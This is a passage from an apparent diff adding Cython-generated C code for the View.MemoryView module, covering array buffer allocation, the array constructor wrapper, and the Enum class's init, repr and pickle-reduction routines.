__Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_array_2__setstate_cython__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_v_i; + PyObject **__pyx_v_p; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_allocate_buffer", 0); + + /* "View.MemoryView":254 + * cdef PyObject **p + * + * self.free_data = True # <<<<<<<<<<<<<< + * self.data = malloc(self.len) + * if not self.data: + */ + __pyx_v_self->free_data = 1; + + /* "View.MemoryView":255 + * + * self.free_data = True + * self.data = malloc(self.len) # <<<<<<<<<<<<<< + * if not self.data: + * raise MemoryError, "unable to allocate array data." + */ + __pyx_v_self->data = ((char *)malloc(__pyx_v_self->len)); + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + __pyx_t_1 = (!(__pyx_v_self->data != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":257 + * self.data = malloc(self.len) + * if not self.data: + * raise MemoryError, "unable to allocate array data." # <<<<<<<<<<<<<< + * + * if self.dtype_is_object: + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_array_data, 0, 0); + __PYX_ERR(1, 257, __pyx_L1_error) + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + * + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":260 + * + * if self.dtype_is_object: + * p = self.data # <<<<<<<<<<<<<< + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + */ + __pyx_v_p = ((PyObject **)__pyx_v_self->data); + + /* "View.MemoryView":261 + * if self.dtype_is_object: + * p = self.data + * for i in range(self.len // self.itemsize): # <<<<<<<<<<<<<< + * p[i] = Py_None + * Py_INCREF(Py_None) + */ + if (unlikely(__pyx_v_self->itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_self->itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_self->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_div_Py_ssize_t(__pyx_v_self->len, __pyx_v_self->itemsize); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":262 + * p = self.data + * for i in range(self.len // self.itemsize): + * p[i] = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * return 0 + */ + (__pyx_v_p[__pyx_v_i]) = Py_None; + + /* "View.MemoryView":263 + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * return 0 + * + */ + Py_INCREF(Py_None); + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + * + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + } + + /* "View.MemoryView":264 + * p[i] = Py_None + * Py_INCREF(Py_None) + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._allocate_buffer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + +static struct __pyx_array_obj *__pyx_array_new(PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, char *__pyx_v_format, char *__pyx_v_c_mode, char *__pyx_v_buf) { + struct __pyx_array_obj *__pyx_v_result = 0; + PyObject *__pyx_v_mode = 0; + struct __pyx_array_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("array_cwrapper", 0); + + /* "View.MemoryView":270 + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. # <<<<<<<<<<<<<< + * + * if buf is NULL: + */ + if (((__pyx_v_c_mode[0]) == 'f')) { + __Pyx_INCREF(__pyx_n_s_fortran); + __pyx_t_1 = __pyx_n_s_fortran; + } else { + __Pyx_INCREF(__pyx_n_s_c); + __pyx_t_1 = __pyx_n_s_c; + } + __pyx_v_mode = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + __pyx_t_2 = (__pyx_v_buf == NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":273 + * + * if buf is NULL: + * result = array.__new__(array, shape, itemsize, format, mode) # <<<<<<<<<<<<<< + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + */ + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_t_3); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_v_mode); + __pyx_t_1 = 0; + __pyx_t_3 = 0; + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_4, NULL)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":275 + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) # <<<<<<<<<<<<<< + * result.data = buf + * + */ + /*else*/ { + __pyx_t_3 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_t_4); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_mode); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_allocate_buffer, Py_False) < 0) __PYX_ERR(1, 275, __pyx_L1_error) + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_1, __pyx_t_4)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":276 + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + * result.data = buf # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->data = __pyx_v_buf; + } + __pyx_L3:; + + /* "View.MemoryView":278 + * result.data = buf + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.array_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_mode); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + +/* Python wrapper */ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_name = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 304, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(1, 304, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + } + __pyx_v_name = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 304, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__", 0); + + /* "View.MemoryView":305 + * cdef object name + * def __init__(self, name): + * self.name = name # <<<<<<<<<<<<<< + * def __repr__(self): + * return self.name + */ + __Pyx_INCREF(__pyx_v_name); + __Pyx_GIVEREF(__pyx_v_name); + __Pyx_GOTREF(__pyx_v_self->name); + __Pyx_DECREF(__pyx_v_self->name); + __pyx_v_self->name = __pyx_v_name; + + /* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + +/* Python wrapper */ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":307 + * self.name = name + * def __repr__(self): + * return self.name # <<<<<<<<<<<<<< + * + * cdef generic = Enum("") + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->name); + __pyx_r = __pyx_v_self->name; + goto __pyx_L0; + + /* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_MemviewEnum___reduce_cython__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_v_state = 0; + PyObject *__pyx_v__dict = 0; + int __pyx_v_use_setstate; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":5 + * cdef object _dict + * cdef bint use_setstate + * state = (self.name,) # <<<<<<<<<<<<<< + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_self->name); + __Pyx_GIVEREF(__pyx_v_self->name); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_self->name); + __pyx_v_state = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "(tree fragment)":6 + * cdef bint use_setstate + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) # <<<<<<<<<<<<<< + * if _dict is not None: + * state += (_dict,) + */ + __pyx_t_1 = __Pyx_GetAttr3(((PyObject *)__pyx_v_self), __pyx_n_s_dict, Py_None); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v__dict = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + __pyx_t_2 = (__pyx_v__dict != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":8 + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: + * state += (_dict,) # <<<<<<<<<<<<<< + * use_setstate = True + * else: + */ + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v__dict); + __Pyx_GIVEREF(__pyx_v__dict); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v__dict); + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_state, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_state, ((PyObject*)__pyx_t_3)); + __pyx_t_3 = 0; + + /* "(tree fragment)":9 + * if _dict is not None: + * state += (_dict,) + * use_setstate = True # <<<<<<<<<<<<<< + * else: + * use_setstate = self.name is not None + */ + __pyx_v_use_setstate = 1; + + /* "(tree fragment)":7 + * state = (self.name,) + * _dict = getattr(self, '__dict__', None) + * if _dict is not None: # <<<<<<<<<<<<<< + * state += (_dict,) + * use_setstate = True + */ + goto __pyx_L3; + } + + /* "(tree fragment)":11 + * use_setstate = True + * else: + * use_setstate = self.name is not None # <<<<<<<<<<<<<< + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_self->name != Py_None); + __pyx_v_use_setstate = __pyx_t_2; + } + __pyx_L3:; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + if (__pyx_v_use_setstate) { + + /* "(tree fragment)":13 + * use_setstate = self.name is not None + * if use_setstate: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state # <<<<<<<<<<<<<< + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_1, 2, Py_None); + __pyx_t_4 = PyTuple_New(3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_state); + __Pyx_GIVEREF(__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_state); + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "(tree fragment)":12 + * else: + * use_setstate = self.name is not None + * if use_setstate: # <<<<<<<<<<<<<< + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + */ + } + + /* "(tree fragment)":15 + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, None), state + * else: + * return __pyx_unpickle_Enum, (type(self), 0x82a3537, state) # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * __pyx_unpickle_Enum__set_state(self, __pyx_state) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_pyx_unpickle_Enum); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_GIVEREF(((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)Py_TYPE(((PyObject *)__pyx_v_self)))); + __Pyx_INCREF(__pyx_int_136983863); + __Pyx_GIVEREF(__pyx_int_136983863); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_int_136983863); + 